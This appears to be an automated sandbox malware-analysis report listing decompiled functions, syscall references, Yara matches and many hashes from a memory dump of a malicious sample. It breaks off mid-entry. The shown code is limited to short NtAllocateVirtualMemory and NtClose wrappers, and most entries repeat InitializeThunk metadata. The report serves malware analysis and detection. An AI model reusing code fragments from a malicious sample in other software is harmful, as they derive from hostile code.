                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                              • Opcode ID: 337debef2460efe0f3762fea0babc2a24c5fe849a6b560e2b09440f3d596a869
                                                                                                                                                              • Instruction ID: 91df1fac3f560b7affcfff4e3b39b967a4d3e7d672431698d67987694753e6bc
                                                                                                                                                              • Opcode Fuzzy Hash: 337debef2460efe0f3762fea0babc2a24c5fe849a6b560e2b09440f3d596a869
                                                                                                                                                              • Instruction Fuzzy Hash: B3F01CB1200108AFDB14DF89DC81EE777ADAF98354F118649FA0D97241C630E811CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                                                              0x004183af
                                                                                                                                                              0x004183b7
                                                                                                                                                              0x004183d9
                                                                                                                                                              0x004183dd

                                                                                                                                                              APIs
                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                              • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                                                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                              • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004182EA, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E004182EA(void* __eax, void* __ecx, intOrPtr _a4, void* _a8) {
				long _t11;
				void* _t16;

				asm("popad");
				asm("cmpsd");
				asm("enter 0x55bb, 0x8b");
				_t8 = _a4;
				_t3 = _t8 + 0x10; // 0x300
				_t4 = _t8 + 0xc50; // 0x409743
				E00418DC0(_t16, _a4, _t4,  *_t3, 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}





                                                                                                                                                              0x004182ea
                                                                                                                                                              0x004182eb
                                                                                                                                                              0x004182ee
                                                                                                                                                              0x004182f3
                                                                                                                                                              0x004182f6
                                                                                                                                                              0x004182ff
                                                                                                                                                              0x00418307
                                                                                                                                                              0x00418315
                                                                                                                                                              0x00418319

                                                                                                                                                              APIs
                                                                                                                                                              • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              • Opcode ID: 26eea605d614eb42a5c1e74c9289c06e68f3fe613bdcfe626341d71b1dbd8884
                                                                                                                                                              • Instruction ID: c9cb421f18702700d531dd65f01477e351dfcd46f1cf2d727dce32871bb0753e
                                                                                                                                                              • Opcode Fuzzy Hash: 26eea605d614eb42a5c1e74c9289c06e68f3fe613bdcfe626341d71b1dbd8884
                                                                                                                                                              • Instruction Fuzzy Hash: 95E08CB62402106FD714DF98CC49EE73B29EF45260F244599FA49EB282C670E6028AD0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                                                                              0x004182f3
                                                                                                                                                              0x004182f6
                                                                                                                                                              0x004182ff
                                                                                                                                                              0x00418307
                                                                                                                                                              0x00418315
                                                                                                                                                              0x00418319

                                                                                                                                                              APIs
                                                                                                                                                              • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                              • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                                                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                              • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009400C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00940048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                              • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                              • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                              • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00940078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                              • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                              • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                              • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009407AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                              • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                              • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                              • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
